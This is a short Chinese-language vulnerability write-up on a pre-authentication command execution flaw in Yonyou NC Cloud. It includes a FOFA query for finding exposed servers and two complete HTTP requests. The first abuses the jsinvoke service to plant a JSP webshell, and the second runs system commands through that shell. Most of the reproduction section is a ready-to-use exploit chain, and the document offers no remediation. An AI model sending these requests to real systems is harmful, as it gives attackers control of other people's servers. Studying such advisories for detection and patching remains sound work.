登录 白背景

用友NC Cloud前台命令执行漏洞

一、漏洞简介

NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

二、影响版本

  • 用友NC Cloud

三、资产测绘

  • fofaapp="用友-NC-Cloud"
  • 登录页面

image.png

四、漏洞复现

  1. 通过poc上传webshell823780482.jsp
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 253
Connection: close

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/823780482.jsp"]}

image.png

  1. 通过webshell执行命令
POST /823780482.jsp?error=bsh.Interpreter HTTP/1.1
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 98
Connection: close

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ipconfig").getInputStream())

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/kwdkxqrecopllmbx